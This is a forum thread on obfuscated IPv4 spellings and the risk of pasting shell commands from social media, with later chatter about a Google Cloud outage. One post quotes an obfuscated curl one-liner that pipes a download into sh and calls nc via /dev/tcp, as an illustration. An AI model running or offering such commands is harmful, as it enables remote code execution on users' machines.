smh if you don't have decades old notes on ip representations that technically work today, because security is about what the program will accept not what it should

# ? Jun 2, 2019 19:23

> Wiggly Wayne DDS posted: smh if you don't have decades old notes on ip representations that technically work today, because security is about what the program will accept not what it should

I have notes I’m sure, but I guess I should check them more carefully!

# ? Jun 2, 2019 19:24

> Wiggly Wayne DDS posted: smh if you don't have decades old notes on ip representations that technically work today, because security is about what the program will accept not what it should

cool let's be sure to let every single user know about this esoterica. oh wait, we don't (i didn't even remember this stuff which is why i posted it originally), it's just another dumb security thing ready to bite laypeople in the rear end. barring that, maybe a little bit of safety? ipv4 expressed in dot notation is pretty much the agreed upon format, so maybe the os shouldn't expose any other way to users?

# ? Jun 2, 2019 19:29

Why would you bring up how source code handles or stores numeric values at all? The premise of that argument is that you're going to take input from a human and then just naively pass it into some code without sanitizing it? No way should a browser or curl be accepting hexadecimal addresses, and any excuse about "it'd be too hard to change" is just a lovely excuse that hurts end users.

Yeah, I get it, you shouldn't blindly copy and paste poo poo. The reality of the world though is that 90% of people do this. How many people are there in the entire world who could read this and tell you exactly what it does without having to spend a few hours reading about it:

`curl -gsS https://127.0.0.1-or-victim-server:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00%5C<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost`

Ten thousand? Probably not 100,000. I use linux professionally every day for the last 8 years and I had to read the article and then spend 20 minutes playing with it to really understand how it was working. So just saying "oh read it before you paste it and understand what it does" is just not realistic for most people.

Salt Fish fucked around with this message at 19:35 on Jun 2, 2019

# ? Jun 2, 2019 19:33

> Salt Fish posted: Why would you bring up how source code handles or stores numeric values at all? The premise of that argument is that you're going to take input from a human and then just naively pass it into some code without sanitizing it? No way should a browser or curl be accepting hexadecimal addresses, and any excuse about "it'd be too hard to change" is just a lovely excuse that hurts end users.

curl is not exactly a consumer-grade, user-friendly browser and is used in tons of scripts, so arguing that it shouldn't accept hex as a valid IP is a little silly. The entire premise is that people are following 'infosec twitter' and loving doing whatever dumb poo poo is posted without any critical thinking. It's not like your aunt Lucy with the 12-year old hand-me-down computer running windows XP is going to be in any way affected by this because it's targeted at a very specific security try-hard class that attempts to understand security the same way an ape understands your skull with a hammer.

# ? Jun 2, 2019 19:37

> ewiley posted: curl is not exactly a consumer-grade, user-friendly browser and is used in tons of scripts, so arguing that it shouldn't accept hex as a valid IP is a little silly. The entire premise is that people are following 'infosec twitter' and loving doing whatever dumb poo poo is posted without any critical thinking. It's not like your aunt Lucy with the 12-year old hand-me-down computer running windows XP is going to be in any way affected by this because it's targeted at a very specific security try-hard class that attempts to understand security the same way an ape understands your skull with a hammer.

We're talking about two groups of people:

1) People who use curl but aren't super technical
2) The people writing scripts that use hex ip addresses

And now we have to choose; do we put the technical burden on the general users to learn how to not get owned by obfuscation techniques? Or do we put the technical burden on the tech wizards using hex in their scripts to go update their code? You're saying we should put the technical burden on the non-technical people, but I'm saying if you're clever enough to use hex ip addresses you're clever enough to update your poo poo with minimal disruption, do a conversion before you curl, it's literally a 1 line change to your code.

# ? Jun 2, 2019 19:44
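
An added example (not part of the thread) of the point that security is about what the parser will accept: Python's `socket.inet_aton` hands the string to the C library parser, which still resolves hex, octal, shorthand and bare-integer spellings, while a hand-written strict check accepts only four decimal octets and a normalization step recovers the real address before it is forwarded; all sample inputs are constructed.

```python
"""Added example: what an IPv4 parser *accepts* versus canonical dotted-decimal.

socket.inet_aton wraps the C library parser, which still honours the legacy
BSD spellings (hex and octal parts, fewer than four parts, a bare integer).
is_strict_dotted() accepts only four plain decimal octets, and
normalize_or_reject() is the "do a conversion before you curl" step.
"""
import re
import socket
from typing import Optional, Tuple

# One octet, 0-255, with no leading zero (a leading zero means octal to inet_aton).
_OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
_STRICT_IPV4 = re.compile(rf"^{_OCTET}(?:\.{_OCTET}){{3}}$")


def lenient_to_dotted(text: str) -> Optional[str]:
    """Parse TEXT the permissive way (C inet_aton) and return the address it really names.

    Returns None only when even the lenient parser gives up.
    """
    try:
        packed = socket.inet_aton(text)
    except OSError:
        return None
    return socket.inet_ntoa(packed)


def is_strict_dotted(text: str) -> bool:
    """True only for the canonical spelling: exactly four decimal octets."""
    return _STRICT_IPV4.fullmatch(text) is not None


def normalize_or_reject(text: str) -> Tuple[bool, Optional[str]]:
    """Defensive policy: (is canonical, what the libc parser would have resolved it to).

    A caller that forwards TEXT only when the first element is True never passes an
    obfuscated spelling downstream; the second element shows where it would have gone.
    """
    return is_strict_dotted(text), lenient_to_dotted(text)


if __name__ == "__main__":
    # Constructed sample inputs (no real hosts); the last two are rejected by both.
    samples = ["127.0.0.1", "127.1", "0177.0.0.1", "0x7f.1", "2130706433",
               "0x0238f06a", "256.1.1.1", "not an ip"]
    for s in samples:
        strict, resolved = normalize_or_reject(s)
        print(f"{s:>12}  canonical={strict!s:5}  libc resolves to: {resolved}")
```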

curling will continue until the morale improves

# ? Jun 2, 2019 19:45

> Salt Fish posted: We're talking about two groups of people:

What non-technical person is using curl? notDan's tweet required you to paste it into a Linux commandline to do anything. What is the demographic of people with a) access to a Linux commandline b) not technical enough to understand the Linux commandline? the venn diagram is bad computer janitors who should either know better or now know better.

# ? Jun 2, 2019 19:49

Also LOL don't include that functionality in your app because i can't be assed to run stuff in a sandbox VM.

# ? Jun 2, 2019 19:51

> Blinkz0rz posted: cool let's be sure to let every single user know about this esoterica

> Salt Fish posted: `curl -gsS https://127.0.0.1-or-victim-server:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00%5C<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost`

at this point is the issue really the ip representation in the one-liner, or that it's possible for anything to be obscured in it at all? there's good arguments to be had on the correct way to interpret ips, but it's not really relevant if you're in a shell where the flexibility in handling representations is the core strength of chaining inputs between programs

# ? Jun 2, 2019 19:55

> ewiley posted: What non-technical person is using curl? notDan's tweet required you to paste it into a Linux commandline to do anything. What is the demographic of people with

or software developers who understand enough of their environment to write code but don't really care about how it works, like literally everyone outside of security practitioners (and only some segments tbh) and os developers

# ? Jun 2, 2019 19:58

> ewiley posted: What non-technical person is using curl? notDan's tweet required you to paste it into a Linux commandline to do anything. What is the demographic of people with

when a take is so dumb i genuinely can't figure out if it's trolling

# ? Jun 2, 2019 20:00

> Wiggly Wayne DDS posted: ya no one's saying every user should know this, it's in the pile of dumb legacy tricks that exist to make someone feel smart but shoot themselves in the foot

i think we're sort of talking past each other. no one is suggesting that people should blindly execute any command on twitter and then pipe it to a shell. what i'm suggesting is that linux has a long standing tradition of doing a really lovely job separating the user interface from the underlying code, and that will become a fundamental security issue as more people are using linux and macos

# ? Jun 2, 2019 20:09

where is linux involved here

# ? Jun 2, 2019 20:13

ok operating systems in general? like, you keep talking about how things are, but the fact that a user can interact with an ip address expressed in multiple ways is awful ux and a potential sec gently caress that's continuously ready to happen

# ? Jun 2, 2019 20:25

> Blinkz0rz posted: i think we're sort of talking past each other. no one is suggesting that people should blindly execute any command on twitter and then pipe it to a shell. what i'm suggesting is that linux has a long standing tradition of doing a really lovely job separating the user interface from the underlying code and that will become a fundamental security issue as more people are using linux and macos

I think i'm agreeing with you that the underlying problem is uncritically running code from a tweet, but obfuscation will exist as long as there is code. Dumb tricks are a feature not a bug. I mean hell this is a perfectly valid perl script:

code:

# ? Jun 2, 2019 20:26

there is some dumb ancient UNIX-related reason for almost every legacy computer issue. quit being so pedantic

# ? Jun 2, 2019 20:26

> Blinkz0rz posted: the fact that a user can interact with an ip address expressed in multiple ways is awful ux and a potential sec gently caress that's continuously ready to happen

# ? Jun 2, 2019 20:27

Apparently google cloud is down and most of the internal tools inside google are down too

# ? Jun 2, 2019 22:03

> Pryor on Fire posted: Apparently google cloud is down

Wrap it up, Googailures. Last one out turn out the lights.

# ? Jun 2, 2019 22:07

I understand Level3 is having problems. Level3 is a backbone provider for the internet, and everything else, including Google being down, is just a cascade failure from the Level3 issues.

# ? Jun 2, 2019 22:09

> Schadenboner posted: Wrap it up, Googailures. Last one out turn out the lights.

can't turn off the lights, they're on nest

https://news.ycombinator.com/item?id=20077971

> Can't use my Nest lock to let guests into my house. I'm pretty sure their infrastructure is hosted in Google Cloud. So yeah... definitely some stuff lost.

# ? Jun 2, 2019 23:15

security is a process (of blaming the user)

# ? Jun 2, 2019 23:32

nest users are confused: https://twitter.com/internetofshit/status/1135310349438054401

# ? Jun 3, 2019 00:15

oh no moving from a chair to use the thing manually like some troglodyte is beneath the mighty *puts on glasses* stay at home dad twitch streamer wearing a boba fett hoody

# ? Jun 3, 2019 00:39

good thread to read in the morning: https://twitter.com/Foone/status/1135354815259656192

# ? Jun 3, 2019 12:20

> Agile Vector posted: oh no moving from a chair to use the thing manually like some troglodyte is beneath the mighty *puts on glasses* stay at home dad twitch streamer wearing a boba fett hoody

it gets better: https://twitter.com/jdantastic/status/1135313567346036741

fucker mounted his tv in front of it

# ? Jun 3, 2019 12:46

> Chris Knight posted: it gets better:

# ? Jun 3, 2019 12:49

Excuse me, I believe you mean his Electronics Nook

# ? Jun 3, 2019 12:51

> Volmarias posted: Excuse me, I believe you mean his Electronics Nook

I was super confused about why this dude was working in an office with no A/C, but it turns out that his office is in his home, because he plays video games for a living. His office is where he plays video games, for money. It all makes sense now. Twitch is like charity.

# ? Jun 3, 2019 13:12

> Wiggly Wayne DDS posted: good thread to read in the morning:

this was fun, thanks!

# ? Jun 3, 2019 13:33

> Wiggly Wayne DDS posted: good thread to read in the morning:

Very fun, thank you!

# ? Jun 3, 2019 14:17

> Wiggly Wayne DDS posted: good thread to read in the morning:

Neat.

# ? Jun 3, 2019 15:32

> Wiggly Wayne DDS posted: good thread to read in the morning:

cool story bro

# ? Jun 3, 2019 15:42

> Wiggly Wayne DDS posted: good thread to read in the morning:

this was really neat! and @foone is a pro twitter follow. his best work is https://deathgenerator.com

# ? Jun 3, 2019 16:04

Is there a term for people tuning out (deliberately or subconsciously) common disclaimers or security warnings?

# ? Jun 3, 2019 17:27

> Orcs and Ostriches posted: Is there a term for people tuning out (deliberately or subconsciously) common disclaimers or security warnings?

alarm fatigue, probably

# ? Jun 3, 2019 17:28

like alarm fatigue?

# ? Jun 3, 2019 17:29

Nobody-can-tell-me-what-to-do-monia

# ? Jun 3, 2019 17:29

> haveblue posted: alarm fatigue, probably

> Trabisnikof posted: like alarm fatigue?

Thanks. I knew I heard the term somewhere but I just couldn't recall it.

# ? Jun 3, 2019 17:31